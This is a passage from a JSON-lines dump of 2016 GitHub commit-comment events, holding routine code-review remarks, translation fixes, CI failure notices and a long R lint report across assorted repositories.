{"id":"4583872805","type":"CommitCommentEvent","actor":{"login":"ssmusoke"},"repo":{"name":"openmrs/openmrs-module-htmlformentry"},"payload":{"comment":{"id":19080229,"position":null,"line":null,"path":null,"commit_id":"f95c76214d682bc6df33b7ffdb2c8b9d413d5b27","created_at":"2016-09-19T15:11:22Z","updated_at":"2016-09-19T15:11:22Z","body":"@dkayiwa  this commit breaks the script tag just like https://github.com/openmrs/openmrs-module-htmlformentry/commit/f5f9a0aa78af9e0aad7f2be14fc6696d056c7f9f which was reverted https://github.com/openmrs/openmrs-module-htmlformentry/commit/a4a4d16783d1f38a8b2b10f58f9f28ea154cd834"}},"created_at":"2016-09-19T15:11:22Z"}
{"id":"4583876009","type":"CommitCommentEvent","actor":{"login":"apoleshchuk"},"repo":{"name":"ewgRa/de_faq"},"payload":{"comment":{"id":19080238,"position":14,"line":36,"path":"Авто.md","commit_id":"887ae7afb2c56df2751f4b99e4e29e815c76b038","created_at":"2016-09-19T15:11:55Z","updated_at":"2016-09-19T15:11:55Z","body":"Получил DriveNow Customer Card на Российские права нового образца (пластик размером с карточку) и на заграничный паспорт РФ. Но пока не пробовал сам прокат, был с ребенком и не хотелось заморачиваться с поиском бустера/детского кресла (в SiXT'е сказали, что в прокат отдельно кресло не дают, но в соседней конторе вроде как можно взять).\r\nПолучал в Аэропорту Köln bonn flughafen в офисе SiXT (Terminal D). Дополнительно сверили данные с банковской карты, привязанной на сайте, которая на момент получения уже была не действительна, но по счастливой случайности я ее не выложил из кошелька."}},"created_at":"2016-09-19T15:11:55Z"}
{"id":"4583880031","type":"CommitCommentEvent","actor":{"login":"kostya"},"repo":{"name":"kostya/crystal-benchmarks-game"},"payload":{"comment":{"id":19080253,"position":85,"line":99,"path":"README.md","commit_id":"f5a82a51708468bb1d6a3f938257f83ba83519fe","created_at":"2016-09-19T15:12:43Z","updated_at":"2016-09-19T15:12:43Z","body":"this return perfomance back.\r\n```diff\r\ndiff --git a/spectralnorm/spectralnorm.cr b/spectralnorm/spectralnorm.cr\r\nindex 2d601a5..d9137e3 100644\r\n--- a/spectralnorm/spectralnorm.cr\r\n+++ b/spectralnorm/spectralnorm.cr\r\n@@ -1,14 +1,14 @@\r\n # Copied with little modifications from: https://github.com/wmoxam/Ruby-Benchmarks-Game/blob/master/benchmarks/spectral-norm.rb\r\n \r\n def eval_A(i, j)\r\n-  return 1.0_f64 / ((i + j) * (i + j + 1.0) / 2.0 + i + 1.0)\r\n+  1.0_f64 / ((i + j) * (i + j + 1.0) / 2.0 + i + 1.0)\r\n end\r\n \r\n def eval_A_times_u(u)\r\n   (0...u.size).map do |i|\r\n     v = 0.0_f64\r\n-    (0...u.size).each do |j|\r\n-      v += eval_A(i, j) * u[j]\r\n+    u.each_with_index do |uu, j|\r\n+      v += eval_A(i, j) * uu\r\n     end\r\n     v\r\n   end\r\n@@ -17,8 +17,8 @@ end\r\n def eval_At_times_u(u)\r\n   (0...u.size).map do |i|\r\n     v = 0.0_f64\r\n-    (0...u.size).each do |j|\r\n-      v += eval_A(j, i) * u[j]\r\n+    u.each_with_index do |uu, j|\r\n+      v += eval_A(j, i) * uu\r\n     end\r\n     v\r\n   end\r\n\r\n```"}},"created_at":"2016-09-19T15:12:43Z"}
{"id":"4583893247","type":"CommitCommentEvent","actor":{"login":"hannestyden"},"repo":{"name":"argha-c/convenience"},"payload":{"comment":{"id":19080279,"position":null,"line":null,"path":null,"commit_id":"6e0636e25e7517f9adb3b288c005508a6dd2cd95","created_at":"2016-09-19T15:14:50Z","updated_at":"2016-09-19T15:14:50Z","body":"@argha-c: Given that this isn't using a [`dangling=true` filter](https://docs.docker.com/engine/reference/commandline/volume_ls/#/dangling), won't *all* volumes be removed?\r\n"}},"created_at":"2016-09-19T15:14:50Z"}
{"id":"4583895000","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":19080284,"position":10,"line":48,"path":"Sources/Commands/SwiftTool.swift","commit_id":"83b1d9780e1567e44edab03c1826c0280590c2c0","created_at":"2016-09-19T15:15:09Z","updated_at":"2016-09-19T15:15:09Z","body":"FWIW 'dynamicSelf' is a misnomer here"}},"created_at":"2016-09-19T15:15:09Z"}
{"id":"4583896987","type":"CommitCommentEvent","actor":{"login":"Logiqx"},"repo":{"name":"Logiqx/parso"},"payload":{"comment":{"id":19080287,"position":null,"line":null,"path":null,"commit_id":"e2ca4182be224c0a1e9495109e4538cfa545d7a9","created_at":"2016-09-19T15:15:31Z","updated_at":"2016-09-19T15:15:31Z","body":"My change was just a quick hack to support the various formats that I have encountered in my environment. I used the following SAS page as quick reference -http://support.sas.com/documentation/cdl/en/lrdict/64316/HTML/default/viewer.htm#a000309859.htm\r\n\r\nI think your regex approach is more elegant as it also handles the w.d formats but I haven't encountered w.d formats in our SAS files. The last 4 lines in my commit (MMYY, YYMM, MONYY, YYMON)  have been encountered in our data so it is probably worth you adding support for them as well.\r\n\r\nMy only reservation with your change (and my own modification to the original code) is that the type evaluation looks like it is done on each record, I think. This means unnecessary processing as the type evaluation can potentially be done once for entire SAS file.\r\n\r\nYou might also like to look at the fix for buffer underflows (e.g. 4 byte dates). I adopted [pull request #4](https://github.com/epam/parso/pull/4) in our own environment but I've subsequently discovered 3 bytes dates and 5 byte dates. I therefore made a further [tweak](https://github.com/Logiqx/parso/commit/288712ef9b1ba1a62390ffcc68470bd348407526) so that date types between 3 and 8 bytes are supported."}},"created_at":"2016-09-19T15:15:31Z"}
{"id":"4583897009","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19080288,"position":null,"line":null,"path":null,"commit_id":"8adf77726df70c8226a8d402035a5255b63eee55","created_at":"2016-09-19T15:15:31Z","updated_at":"2016-09-19T15:15:31Z","body":"@LoneGazebo I wonder if this also could've been a problem in your final test last night where turn wouldn't turn over in MP."}},"created_at":"2016-09-19T15:15:31Z"}
{"id":"4583898949","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19080294,"position":106,"line":219,"path":"Translations/Interface/Français.json","commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T15:15:50Z","updated_at":"2016-09-19T15:15:50Z","body":"Ola, on line 202 : DEMARRER appear to be cut.\r\nReplace \"DEMARRER\" and \"STOP\" by \"Début\" & \"Fin\" (no maj) could be a good thing.\r\n:) ty"}},"created_at":"2016-09-19T15:15:50Z"}
{"id":"4583899981","type":"CommitCommentEvent","actor":{"login":"CHuang0-0"},"repo":{"name":"CHuang0-0/Temp-Code-ACS-"},"payload":{"comment":{"id":19080295,"position":null,"line":null,"path":null,"commit_id":"9dd7ea371c44433e18b8ed5b2f9c9878008a3daa","created_at":"2016-09-19T15:16:02Z","updated_at":"2016-09-19T15:16:02Z","body":"Temporary Code for ACS - 09/18/2016"}},"created_at":"2016-09-19T15:16:02Z"}
{"id":"4583900859","type":"CommitCommentEvent","actor":{"login":"myfreeer"},"repo":{"name":"myfreeer/bilibili-helper"},"payload":{"comment":{"id":19080298,"position":null,"line":null,"path":null,"commit_id":"0afcd64cf6e0935b3a87441280cd118616b80d6c","created_at":"2016-09-19T15:16:13Z","updated_at":"2016-09-19T15:16:13Z","body":"some online lists:\r\nhttps://raw.githubusercontent.com/Felix2yu/bilist/master/tv.bilibili.player.xml\r\nhttps://raw.githubusercontent.com/Thiece/bilibili-safe/master/tv.bilibili.player.xml"}},"created_at":"2016-09-19T15:16:13Z"}
{"id":"4583901080","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":19080299,"position":10,"line":48,"path":"Sources/Commands/SwiftTool.swift","commit_id":"83b1d9780e1567e44edab03c1826c0280590c2c0","created_at":"2016-09-19T15:16:14Z","updated_at":"2016-09-19T15:16:14Z","body":"`dynamicType`?"}},"created_at":"2016-09-19T15:16:14Z"}
{"id":"4583905246","type":"CommitCommentEvent","actor":{"login":"ajgr"},"repo":{"name":"bennyguitar/Colours"},"payload":{"comment":{"id":19080309,"position":null,"line":null,"path":null,"commit_id":"8fcd5be1c8f4f65fc6968263c54060661dbe0a7d","created_at":"2016-09-19T15:16:57Z","updated_at":"2016-09-19T15:16:57Z","body":"Sure about this? The change to \" && CGColorGetNumberOfComponents(self.CGColor) == 4\" on line 129 has this function fail in my tests as CGColorGetNumberOfComponents(self.CGColor) will return 2. "}},"created_at":"2016-09-19T15:16:57Z"}
{"id":"4583911581","type":"CommitCommentEvent","actor":{"login":"pravinyadav"},"repo":{"name":"owlwink/Max_Unity_Live_Chroma_Key"},"payload":{"comment":{"id":19080323,"position":1,"line":1,"path":"Max_Unity_Live_Chroma_Key.txt","commit_id":"54eb41d251525eaa337a71fbc70454f3fed60819","created_at":"2016-09-19T15:18:03Z","updated_at":"2016-09-19T15:18:03Z","body":"I am working on Win7 Unity 5.3.4f1 (32 bit)\r\nWhat do you mean by \r\n4. Open the max_unity_chroma_key patcher.\r\nas from the repository I got max_unity_chroma_key.maxpat file.\r\nCan yo pls elaborate on this.\r\nThx."}},"created_at":"2016-09-19T15:18:03Z"}
{"id":"4583913938","type":"CommitCommentEvent","actor":{"login":"PuenteVinicius"},"repo":{"name":"PuenteVinicius/Papelaria"},"payload":{"comment":{"id":19080328,"position":null,"line":null,"path":null,"commit_id":"f5a1e226ec831f281ef28c9a2c8ec64bfd78f3b2","created_at":"2016-09-19T15:18:31Z","updated_at":"2016-09-19T15:18:31Z","body":"Primeiro teste com html"}},"created_at":"2016-09-19T15:18:31Z"}
{"id":"4583916366","type":"CommitCommentEvent","actor":{"login":"Markenson"},"repo":{"name":"projeto-siga/siga"},"payload":{"comment":{"id":19080337,"position":null,"line":null,"path":null,"commit_id":"7641ecff16070731660f6ad2954828d589c8be27","created_at":"2016-09-19T15:18:56Z","updated_at":"2016-09-19T15:18:56Z","body":"A ideia é boa, mas temos que pensar em um modo de fazer isso. Muitas vezes esses scripts precisam de parte dos dados carregados durante a execução e pode ser difícil criar toda a estrutura e só depois carregar os dados (deve até dar pra fazer isso no flyway, mas não sei dizer de imediato se isso é possível). \r\n\r\nOutra coisa é que esses scripts são guardados da forma que são enviados à equipe do banco de dados. Sendo assim, servem como referência e documentação. Se dividirmos em duas partes, precisamos garantir que essa característica não seja perdida."}},"created_at":"2016-09-19T15:18:56Z"}
{"id":"4583921115","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19080352,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-19T15:19:49Z","updated_at":"2016-09-19T15:19:49Z","body":"For a query like this - \r\n\"`tag1.tag2.tag3.tag4`|transform.rate  where app in ('app1') and host in ('host1') from 1474294444791 to 1474296244791\"\r\n\r\nOn the query response, in graph legend, it displays like this - \r\napp1 host1 transform.rate(tag1.tag2.tag3.tag4)\r\n\r\nNow the function name eliminated from the display, so this shows in the legend as \r\napp1 host1 tag1.tag2.tag3.tag4"}},"created_at":"2016-09-19T15:19:49Z"}
{"id":"4583925201","type":"CommitCommentEvent","actor":{"login":"SteveLasker"},"repo":{"name":"developerforce/visual-studio-tools"},"payload":{"comment":{"id":19080359,"position":null,"line":null,"path":null,"commit_id":"34e73844ec8bb3241001cddec9a102a45d55d646","created_at":"2016-09-19T15:20:34Z","updated_at":"2016-09-19T15:20:34Z","body":"Hi Robert. We appreciate the contribution. However as Eric mentions. Our goal was to provide a starting point for code and not continue the \"can't touch this\" style of generated files. Partial types and eventa have proven too limited in their extensibility and frustrating when the code you want to change is right there. \r\nIf you look at the Salesforce connected service provider you can see an example where we iterate over the code in your project to enhance it, not overweight it. In the Salesforce case, we sync the model classes to match"}},"created_at":"2016-09-19T15:20:34Z"}
{"id":"4583925293","type":"CommitCommentEvent","actor":{"login":"carotorrehdz"},"repo":{"name":"ecristerna/movil.focus"},"payload":{"comment":{"id":19080362,"position":null,"line":null,"path":null,"commit_id":"319fa91677adeabffc2dba60225df0b61d31c6ee","created_at":"2016-09-19T15:20:35Z","updated_at":"2016-09-19T15:20:35Z","body":"👍 "}},"created_at":"2016-09-19T15:20:35Z"}
{"id":"4583928219","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19080374,"position":null,"line":null,"path":null,"commit_id":"38560dc8a8b496fd96ca23a2dce34f9892a3f5b9","created_at":"2016-09-19T15:21:07Z","updated_at":"2016-09-19T15:21:07Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dL-j8J_XQdW5FmmkB-dbGA"}},"created_at":"2016-09-19T15:21:07Z"}
{"id":"4583929903","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Ku60pr/homework3"},"payload":{"comment":{"id":19080378,"position":10,"line":10,"path":"src/Main.java","commit_id":"30746bf366f28399b1d9bccfb55e1982ba0eae8b","created_at":"2016-09-19T15:21:26Z","updated_at":"2016-09-19T15:21:26Z","body":"Зачем делать его статическим?"}},"created_at":"2016-09-19T15:21:26Z"}
{"id":"4583930216","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"kukookoo/BlueHouseProject-1"},"payload":{"comment":{"id":19080380,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-19T15:21:29Z","updated_at":"2016-09-19T15:21:29Z","body":"system(\"pause\"); 추가안해도 되나요?"}},"created_at":"2016-09-19T15:21:29Z"}
{"id":"4583930406","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080382,"position":3,"line":3,"path":"about.html","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:21:31Z","updated_at":"2016-09-19T15:21:31Z","body":"This should be between the `<head>` opening and closing tags."}},"created_at":"2016-09-19T15:21:31Z"}
{"id":"4583932962","type":"CommitCommentEvent","actor":{"login":"4ian"},"repo":{"name":"4ian/GD"},"payload":{"comment":{"id":19080389,"position":null,"line":null,"path":null,"commit_id":"6ac34ee7e3065361c16a3a3c82fea300a115c1ed","created_at":"2016-09-19T15:21:57Z","updated_at":"2016-09-19T15:21:57Z","body":"I'd like too yes :)"}},"created_at":"2016-09-19T15:21:57Z"}
{"id":"4583933886","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080393,"position":10,"line":10,"path":"about.html","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:22:09Z","updated_at":"2016-09-19T15:22:09Z","body":"Instead of a break tag here, I would use margin-bottom to get the desired spacing below."}},"created_at":"2016-09-19T15:22:09Z"}
{"id":"4583936642","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19080402,"position":null,"line":null,"path":null,"commit_id":"f6ae31244c0665f52c88c09e3d6e1e400a6ee0b5","created_at":"2016-09-19T15:22:38Z","updated_at":"2016-09-19T15:22:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1048](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13566&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 221, ignored: 3 Build time: 00:12:05\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T15:22:38Z"}
{"id":"4583937495","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080403,"position":20,"line":20,"path":"about.html","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:22:47Z","updated_at":"2016-09-19T15:22:47Z","body":"I would stick to all lowercase for naming."}},"created_at":"2016-09-19T15:22:47Z"}
{"id":"4583937650","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Ku60pr/homework3"},"payload":{"comment":{"id":19080404,"position":12,"line":12,"path":"src/Main.java","commit_id":"30746bf366f28399b1d9bccfb55e1982ba0eae8b","created_at":"2016-09-19T15:22:49Z","updated_at":"2016-09-19T15:22:49Z","body":"Должен быть private"}},"created_at":"2016-09-19T15:22:49Z"}
{"id":"4583942688","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19080419,"position":63,"line":63,"path":"rotation.go","commit_id":"698694d783dbe0a6080b3690c0d5dd40a415eae2","created_at":"2016-09-19T15:23:44Z","updated_at":"2016-09-19T15:23:44Z","body":"多此一举"}},"created_at":"2016-09-19T15:23:44Z"}
{"id":"4583944745","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080425,"position":15,"line":15,"path":"about.html","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:24:07Z","updated_at":"2016-09-19T15:24:07Z","body":"Rename this image to something shorter. Also, this path would only work on your laptop. Instead of adding the full path, you should use the relative path \"images/screenshot.png\". "}},"created_at":"2016-09-19T15:24:07Z"}
{"id":"4583944764","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19080426,"position":7,"line":7,"path":"Translations/Interface/Français.json","commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T15:24:07Z","updated_at":"2016-09-19T15:24:07Z","body":"Ola, \"Auto Compléter le tuto et utiliser le nom ci-dessous\" must be change by \r\n\"Compléter automatiquement le Tuto et utiliser le nom ci-dessous\"\r\nmake more sense.\r\n:)"}},"created_at":"2016-09-19T15:24:07Z"}
{"id":"4583948223","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080436,"position":4,"line":4,"path":"portfolio.html","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:24:42Z","updated_at":"2016-09-19T15:24:42Z","body":"Don't forget to add the title tag on this page too."}},"created_at":"2016-09-19T15:24:42Z"}
{"id":"4583949235","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19080438,"position":null,"line":null,"path":null,"commit_id":"7a6af664e3a64735d7f61b7a1b5efd52e4510212","created_at":"2016-09-19T15:24:51Z","updated_at":"2016-09-19T15:24:51Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               